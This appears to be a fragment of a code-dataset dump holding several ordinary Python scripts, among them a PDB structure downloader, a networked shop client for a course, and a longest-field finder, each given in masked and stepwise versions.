"step-4": "import Bio\nimport os\nimport sys\nfrom Bio import PDB\nfrom Bio.PDB import PDBIO\nfrom Bio.PDB.PDBParser import PDBParser\nimport math\nimport numpy\nfrom collections import Counter\nimport random\nfrom Bio.PDB import *\nimport gzip\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\npdbl = PDB.PDBList()\nError_out = open('microfolds_out.txt', 'w')\ncng = 0\nAA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',\n 'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']\nCF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',\n 'UNX']\nMetals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',\n 'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',\n 'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',\n 'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']\ncofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']\nidxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\nidx = open(idxfile, 'r')\nidx.readline()\nEC = ''\ni = 0\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
"step-5": "import Bio\r\nimport os\r\nimport sys\r\nfrom Bio import PDB\r\nfrom Bio.PDB import PDBIO\r\nfrom Bio.PDB.PDBParser import PDBParser\r\nimport math\r\nimport numpy\r\nfrom collections import Counter\r\nimport random \r\nfrom Bio.PDB import *\r\nimport gzip\r\ndef get_center(res_list):\r\n coord = []\r\n \r\n for atom in residue:\r\n # print(atom.coord)\r\n at=atom.coord\r\n x=at[0]\r\n y=at[1]\r\n z=at[2]\r\n atcord=[x,y,z]\r\n coord.append(atcord)\r\n x=0\r\n y=0\r\n z=0\r\n i=0\r\n for point in coord:\r\n i=i+1\r\n x=x+point[0]\r\n y=y+point[1]\r\n z=z+point[2]\r\n x=x/i\r\n y=y/i\r\n z=z/i\r\n center=numpy.array([x,y,z]) \r\n return center;\r\n\r\n\r\n\r\npdbl=PDB.PDBList()\r\nError_out=open(\"microfolds_out.txt\",\"w\")\r\n\r\n\r\ncng=0\r\nAA=['PHE','TRP','TYR','ALA','CYS','ASP','GLU','GLY','HIS','ILE','LYS','LEU','MET','ASN','PRO','GLN','ARG','SER','THR','VAL']\r\nCF=[' DA',' DC',' DG',' DT',' A',' C',' G',' U','HOH','UNK','UNX']\r\nMetals=['FE','MN','CU','CD','OS','CO','NI','W','PT','MO','U','TA','V','AU','IR','Y','GD','RU','YB','SM','PD','AG','EU','RH','PR','RE','LU','TB','HF','HO','DY','ZR','CR','LA','CE','ER','AM','CM','TH','PU','SC','PA']\r\ncofactor=['BCB','CLA','CHL','BCL','CL0','PMR','PHO']\r\n\r\n#organic_cofactors_list=[]\r\n#organic_cofactors_pdb_file=open('manual_cofactor_list_with_quinone.txt','r')\r\n#for line in organic_cofactors_pdb_file:\r\n# line=line.split('\\t')\r\n# organic_cofactors_list.append(line[1][:-1])\r\n\r\n\r\n\r\n\r\nidxfile='cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\r\nidx=open(idxfile,\"r\")\r\nidx.readline()\r\n#idx.readline()\r\n#idx.readline()\r\nEC=\"\"\r\ni=0\r\nfor line in idx:\r\n i=i+1\r\n print(i)\r\n try:\r\n \r\n protein=line[0:4]\r\n protein=protein.lower()\r\n parser = PDB.PDBParser(PERMISSIVE=1)\r\n curdir=os.getcwd()\r\n pdbl.retrieve_pdb_file(protein,pdir=curdir+'/pdbs/')\r\n #print (protein,'/home/hraanan/pdb_download/'+protein[1:3]+'/pdb'+protein+'.ent.gz')\r\n #print 
('unziping')\r\n# gz = gzip.open(filename, 'rb') \r\n# with open(final_file, 'wb') as out: \r\n# out.writelines(gz) \r\n# gz.close()\r\n# #structure = parser.get_structure(protein,protein+'.pdb') \r\n## \r\n# #print ('unziping done')\r\n# #os.remove(filename)\r\n# pdbl.retrieve_pdb_file(protein)\r\n# structure = parser.get_structure(protein,protein[1:3]+'/pdb'+protein+'.ent')\r\n# head= structure.header['head']\r\n# comp = structure.header['compound']\r\n# EC==\"\"\r\n# \r\n# try:\r\n# comp=comp['1']\r\n## except KeyError:\r\n## try:\r\n## EC=comp['ec_number']\r\n## except KeyError:\r\n## try:\r\n## EC=comp['ec']\r\n# except KeyError:\r\n# EC='-.-.-.-'\r\n# try:\r\n# EC=comp['ec']\r\n# except KeyError:\r\n# pass\r\n# try:\r\n# EC=comp['ec_number']\r\n# except KeyError:\r\n# pass\r\n# if EC==\"\": \r\n# EC='-.-.-.-'\r\n# #print(EC)\r\n###\r\n### \r\n# \r\n# sf4ID=[]\r\n# sf4coord=[]\r\n# for model in structure:\r\n# if model.id==0:\r\n# atom_list = Selection.unfold_entities(model, 'A') # A for atoms\r\n# ns = NeighborSearch(atom_list)\r\n# lig=[]\r\n# for chain in model:\r\n# for residue in chain:\r\n# #if residue.resname not in AA and residue.resname not in CF :\r\n# #print(chain.id,residue.resname)\r\n# if residue.resname in organic_cofactors_list: \r\n# #print(chain.id,residue.resname)\r\n# atom_in_res=[]\r\n# for atom in residue:\r\n# atom_in_res.append(atom.element)\r\n# \r\n# #if any(x in Metals for x in atom_in_res)==False:\r\n# #print ('not metal')\r\n# # continue\r\n# \r\n# center = get_center(residue)\r\n# #print ('center',center)\r\n# lig=protein,chain.id,residue.id[1],residue.resname,center\r\n# #print(lig)\r\n# all_neighbors = ns.search(center, 15.0,\"R\") # 15.0 for distance in angstrom\r\n# microfold_name=protein+'.'+residue.resname+'_'+ chain.id +'_'+str(residue.id[1])+'_'+head+'_'+EC\r\n# microfold_name=microfold_name.replace(' ','')\r\n# microfold_name=microfold_name.replace('/','_')\r\n# microfold_dir=residue.resname\r\n# 
microfold_dir=microfold_dir.replace(' ','')\r\n# # print(microfold_name)\r\n# if not os.path.exists('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir):\r\n# os.makedirs('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir)\r\n# Select = Bio.PDB.Select\r\n# class MicroSelect(Select):\r\n# def accept_residue(self, residue):\r\n# if residue in all_neighbors and residue.resname!='HOH':\r\n# return 1\r\n# else:\r\n# return 0\r\n# io=PDBIO()\r\n# io.set_structure(structure)\r\n# #print('/home/hraanan/MicrofoldsPDBs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect()) \r\n# io.save('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())\r\n except:\r\n# e = sys.exc_info()[0]\r\n Error_out.write('xxx\\n')\r\n Error_out.write('/n' )\r\n Error_out.write( \"<p>Error: %s</p>\" )\r\n Error_out.write('xxx\\n')\r\n print('err')\r\n continue\r\n \r\n \r\nError_out.close()\r\n#prot.close()\r\nprint(\"end\")\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
<|reserved_special_token_1|>
dict1 = [{'a': 1}, {'a': 2}, {'a': 3}]
a = dict1[1]['a']
correlation_dict = {'${class_id}': 123}
data = {'token': '${self.token}', 'name': 'api测试', 'class_id': '${class_id}'}
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
<|reserved_special_token_1|>
dict1 = [
{'a':1},
{'a':2},
{'a':3}
]
a = dict1[1]['a']
# print(a)
correlation_dict = {'${class_id}':123}
data = {'token': '${self.token}', 'name': 'api测试','class_id': '${class_id}'}
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
|
flexible
|
{
"blob_id": "9c05b39a12ab29db99397e62315efddd8cdf1df4",
"index": 456,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n",
"step-3": "dict1 = [{'a': 1}, {'a': 2}, {'a': 3}]\na = dict1[1]['a']\ncorrelation_dict = {'${class_id}': 123}\ndata = {'token': '${self.token}', 'name': 'api测试', 'class_id': '${class_id}'}\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n",
"step-4": "dict1 = [\n {'a':1},\n {'a':2},\n {'a':3}\n]\n\na = dict1[1]['a']\n# print(a)\n\ncorrelation_dict = {'${class_id}':123}\n\ndata = {'token': '${self.token}', 'name': 'api测试','class_id': '${class_id}'}\n\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
mlt = 1
mlt_sum = 0
num_sum = 0
for i in range(1,101):
mlt = (i ** 2)
mlt_sum += mlt
num_sum += i
print((num_sum ** 2) - mlt_sum)
|
normal
|
{
"blob_id": "6f877dccab8d62e34b105bbd06027cbff936e3aa",
"index": 6885,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, 101):\n mlt = i ** 2\n mlt_sum += mlt\n num_sum += i\nprint(num_sum ** 2 - mlt_sum)\n",
"step-3": "mlt = 1\nmlt_sum = 0\nnum_sum = 0\nfor i in range(1, 101):\n mlt = i ** 2\n mlt_sum += mlt\n num_sum += i\nprint(num_sum ** 2 - mlt_sum)\n",
"step-4": "mlt = 1\nmlt_sum = 0\nnum_sum = 0\nfor i in range(1,101):\n mlt = (i ** 2)\n mlt_sum += mlt\n num_sum += i\nprint((num_sum ** 2) - mlt_sum)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)
)
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector('passthrough', ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(
go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
loop.close()
<|reserved_special_token_1|>
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
#self.loop = loop
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print("ShopClient connection_made is called\n")
self.transport = transport
# PACKET 1 - Request to Buy packet
startbuy = RequestToBuy()
print("Sending Request to Buy")
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print("ShopClient Data_received is called")
self.deserializer.update(data)
#print(data)
for pkt in self.deserializer.nextPackets():
#print("Client <------------{}------------- Server".format(pkt.DEFINITION_IDENTIFIER))
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
# PACKET 3 - Send Item packet
item = "Butter"
response = SendItem()
response.Item = item
print("Sent SendItem")
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
# PACKET 5 - Send Money packet
response = SendMoney()
response.Cash = pkt.Amount
print("Sent SendMoney")
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print("Client Received Incorrect Packet. Closing Connection. Try Again!")
self.transport.close()
def connection_lost(self,exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate():
#1
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
#logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
#logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector("passthrough", ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
|
flexible
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. 
Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n 
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
#!/usr/bin/env python3
import sys
from pathlib import Path
def print_usage():
sys.stderr.write('''
Find the length of the biggest line in the file.
Usage: ./biggestLine <delimiter> <field number - first element is 0> <file path>
''')
def main():
if len(sys.argv) != 4:
print_usage()
sys.exit(1)
delimiter = sys.argv[1]
field_number = int(sys.argv[2])
file_path = sys.argv[3]
my_file = Path(file_path)
biggest_string = ""
try:
with open(my_file, 'r') as f:
line = f.readline()
line_num = 0
while line:
line_num = line_num + 1
line = f.readline()
curr = line.split(delimiter)[field_number]
if len(curr) > len(biggest_string):
biggest_string = curr
print('Processing Line ' + str(line_num), end='\r')
except IndexError:
print('\nError on line '+str(line_num))
except KeyboardInterrupt:
sys.exit(0)
except FileNotFoundError:
sys.stderr.write('file not found')
sys.exit(1)
print("biggest string is " + str(len(biggest_string)) + " characters")
main()
|
normal
|
{
"blob_id": "c84175edb88f5b9219c22ec717ec30bb530982a2",
"index": 2861,
"step-1": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\nmain()\n",
